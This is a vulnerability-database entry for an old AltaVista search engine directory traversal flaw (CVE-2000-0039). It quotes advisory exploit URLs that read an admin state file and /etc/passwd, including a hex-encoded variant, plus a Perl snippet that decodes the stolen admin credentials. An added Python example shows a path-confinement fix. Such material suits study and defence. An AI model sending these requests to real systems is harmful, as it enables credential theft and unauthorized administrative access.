AltaVista Search Engine Directory Traversal Vulnerability


Vulnerability ID 1105665 Vulnerability type Input validation
Published 1999-12-29 Updated 2005-05-02
CVE ID CVE-2000-0039
CNNVD-ID CNNVD-199912-102
Platform Unix CVSS score 5.0
|Source
https://www.exploit-db.com/exploits/19694
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-102
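|Vulnerability details
A directory traversal vulnerability exists in the query.cgi CGI program of the AltaVista search engine. A remote attacker can use a .. (dot dot) sequence to read files above the document root.
|Exploit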
source: http://www.securityfocus.com/bid/896/info

The AltaVista Search engine sets up a webserver at port 9000 to listen for search queries. The main search function will accept a single '../' string in the query, providing access to all documents in the 'http' directory one level up. These documents contain various administrative information, including the password for the remote administration utility. The password is base-64 encoded, and can be easily restored to plaintext to give an attacker full remote administration abilities for the search engine. The webserver will accept multiple '../' strings if they are hex encoded, i.e. '%2e%2e%2f'.

http://target:9000/cgi-bin/query?mss=../logs/mgtstate
(to get the mgtstate file.)

#!/usr/bin/perl
use MIME::Base64;
print decode_base64("$ARGV[0]"), "\n";
(to unencode the username/password)

http://target:9000/cgi-bin/mgt
and enter the username/password to access the remote administration features

or
http://target:9000/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
to get the password file on a unix system
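
The flaw described above, as an added defensive example (not code from AltaVista or from the original advisory): a filter that inspects the raw `mss` value lets both request forms on this page through, while decoding first and confining the canonical path to the document root rejects them. `DOC_ROOT` and all function names are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/opt/search/http/docs"  # hypothetical document root (assumption)


def naive_is_allowed(raw_value: str) -> bool:
    """Flawed filter: looks at the still-encoded value, tolerates one '../'."""
    return raw_value.count("../") <= 1


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the value stops changing, so encoded and
    nested-encoded dot-dot sequences are seen in their literal form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    raise ValueError("too many encoding layers")


def resolve_confined(raw_value: str, root: str = DOC_ROOT) -> str:
    """Return the canonical path for raw_value; raise ValueError if it
    resolves outside root."""
    decoded = fully_decode(raw_value)
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    # Lexical canonicalisation only; on a real filesystem also resolve
    # symlinks (os.path.realpath) before the prefix comparison.
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("path escapes document root")
    return candidate


if __name__ == "__main__":
    # Constructed sample values; the two traversal strings are the ones on this page.
    samples = ["help/index.html", "../logs/mgtstate",
               "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd"]
    for s in samples:
        try:
            verdict = resolve_confined(s)
        except ValueError as exc:
            verdict = f"rejected: {exc}"
        print(f"naive={naive_is_allowed(s)!s:5} confined={verdict}  <- {s}")
```

The naive filter passes both traversal strings because one contains a single literal '../' and the other contains none until it is decoded; the confinement check compares the resolved path, so the encoding no longer matters.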
|References

Source: BID
Name: 896
Link: http://www.securityfocus.com/bid/896
Source: OSVDB
Name: 15
Link: http://www.osvdb.org/15
